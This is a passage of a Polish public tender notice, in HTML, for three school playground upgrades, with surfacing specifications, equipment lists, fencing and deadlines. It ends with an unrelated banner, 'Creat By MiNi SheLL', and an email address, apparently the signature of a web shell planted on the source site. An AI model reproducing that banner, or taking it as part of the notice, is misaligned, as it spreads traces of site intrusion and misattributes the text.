b)	dostawę i montaż urządzeń zabawowych. Urządzenia zamontowane na fundamentach umieszczonych w gruncie na głębokość minimum 40 cm. Podłoże wokół fundamentów jest ubijane i zagęszczane. Elementy stalowych mocowań urządzeń zabawowych należy zabetonować betonem B-20. Montaż obejmuje następujące urządzenia:
linarium stożek - 1 szt.;
kosz na piłki mini- 1 szt;
tablica kółko i krzyżyk - 1 szt;
sześciokąt z pajęczyną i ścianką wspinaczkową - 1 szt.;
karuzela tarczowa z siedziskami - 1 szt.;
sprężynowiec - konik - 1 szt.;
huśtawka metalowa pojedyncza z zawiesiem z siedziskiem huśtawkowym typu bocianie gniazdo - 1 szt.;
c)	dostawie i montażu pozostałych elementów:
ławki drewnianej z bali - 1szt.;
tablicy - regulamin - 1 szt.,
kosza na śmieci- 1 szt,
d)	wykonaniu ogrodzenia. Ogrodzenie należy wykonać ze stali ocynkowanej lub malowanej proszkowo z przęseł wysokości min. 100 cm i szerokości do 250 cm. W ogrodzeniu należy wykonać furtkę szerokości 120 cm..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.00-7, 37.53.52.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Doposażenie placu zabaw przy Szkole Podstawowej w Niechłoninie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ogólna powierzchnia placu zabaw 180 m2 (13,8 m x 13m) Zakres prac obejmuje:
a)	wykonanie nawierzchni placu zabaw. Nawierzchnia wykonana na podbudowie z kruszywa naturalnego, stabilizowanego mechanicznie. Dopuszczalne jest zastosowanie kruszywa betonowego z wtórnego przerobu. W celu zapewnienie spływu wód opadowych należy zastosować na nawierzchni spadek ok. 1,0%. Na podbudowie z betonu należy ułożyć krawężniki elastyczne gumowe o wymiarach 1000x250x50mm w kolorze czarnym lub zielonym. Wokół urządzeń należy wykonać strefy bezpieczeństwa zgodnie z instrukcjami producenta z nawierzchni bezpiecznej gumowej lub piankowej do stosowania na zewnątrz w kolorze zielonym o łącznej pow. 99m2. Jako nawierzchnię komunikacyjną należy zastosować nawierzchnię w kolorze czerwonym o łącznej powierzchni 20,00m2. Nawierzchnie powinny spełniać normy EN-1177:2008 oraz posiadać atesty PZH. Pozostałą nawierzchnie o pow. 60,40m2 stanowić będzie trawnik. Należy go wykonać na terenie wyniesionym i pozbawionym zagłębień. Nawierzchnia powinna być wyprofilowana ze spadkiem 1-3% ułatwiającym powierzchniowy odpływ wody. Przed założeniem trawnika należy odpowiednio przygotować teren. Trawnik wykonać poprzez ułożenie darni z rolki lub zasiew trawy;
b)	dostawę i montaż urządzeń zabawowych. Urządzenia zamontowane na fundamentach umieszczonych w gruncie na głębokość minimum 40 cm. Podłoże wokół fundamentów jest ubijane i zagęszczane. Elementy stalowych mocowań urządzeń zabawowych należy zabetonować betonem B-20. Montaż obejmuje następujące urządzenia:
huśtawka wagowa - 1 szt.;
karuzela tarczowa z siedziskami - 1 szt.;
sprężynowiec - konik - 1 szt.;
sprężynowiec - auto - 1 szt.;
sprężynowiec - kaczątko - 1 szt.
huśtawka metalowa pojedyncza z zawiesiem z siedziskiem huśtawkowym typu bocianie gniazdo - 1 szt.;
c)	dostawie i montażu pozostałych elementów:
ławki drewnianej z bali - 1szt.;
tablicy - regulamin - 1 szt.,
kosza na śmieci- 1 szt,
d)	wykonaniu ogrodzenia. Ogrodzenie należy wykonać ze stali ocynkowanej lub malowanej proszkowo z przęseł wysokości min. 100 cm i szerokości do 250 cm. W ogrodzeniu należy wykonać furtkę szerokości 120 cm..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.00-7, 37.53.52.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część 3: doposażenie placu zabaw przy Szkole Podstawowej w Wielkim Łęcku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ogólna powierzchnia placu zabaw 180 m2 (13,8 m x 13m) Zakres prac obejmuje:
a)	wykonanie nawierzchni placu zabaw. Nawierzchnia wykonana na podbudowie z kruszywa naturalnego, stabilizowanego mechanicznie. Dopuszczalne jest zastosowanie kruszywa betonowego z wtórnego przerobu. W celu zapewnienie spływu wód opadowych należy zastosować na nawierzchni spadek ok. 1,0%. Na podbudowie z betonu należy ułożyć krawężniki elastyczne gumowe o wymiarach 1000x250x50mm w kolorze czarnym lub zielonym. Wokół urządzeń należy wykonać strefy bezpieczeństwa zgodnie z instrukcjami producenta z nawierzchni bezpiecznej gumowej lub piankowej do stosowania na zewnątrz w kolorze zielonym o łącznej pow. 103,00m2. Jako nawierzchnię komunikacyjną należy zastosować nawierzchnię w kolorze czerwonym o łącznej powierzchni 17,00m2. Nawierzchnie powinny spełniać normy EN-1177:2008 oraz posiadać atesty PZH. Pozostałą nawierzchnie o pow. 59,40 m2 stanowić będzie trawnik. Należy go wykonać na terenie wyniesionym i pozbawionym zagłębień. Nawierzchnia powinna być wyprofilowana ze spadkiem 1-3% ułatwiającym powierzchniowy odpływ wody. Przed założeniem trawnika należy odpowiednio przygotować teren. Trawnik wykonać poprzez ułożenie darni z rolki lub zasiew trawy;
b)	dostawę i montaż urządzeń zabawowych. Urządzenia zamontowane na fundamentach umieszczonych w gruncie na głębokość minimum 40 cm. Podłoże wokół fundamentów jest ubijane i zagęszczane. Elementy stalowych mocowań urządzeń zabawowych należy zabetonować betonem B-20. Montaż obejmuje następujące urządzenia:
zestaw zabawowy - 1 szt.;
karuzela tarczowa z siedziskami - 1 szt.;
sprężynowiec - motor - 1 szt.;
domek drewniany - 1 szt.;
c)	,dostawie i montażu pozostałych elementów:
ławki drewnianej z bali - 1szt.;
tablicy - regulamin - 1 szt.,
kosza na śmieci- 1 szt,
d)	wykonaniu ogrodzenia. Ogrodzenie należy wykonać ze stali ocynkowanej lub malowanej proszkowo z przęseł wysokości min. 100 cm i szerokości do 250 cm. W ogrodzeniu należy wykonać furtkę szerokości 120 cm..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.00-7, 37.53.52.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com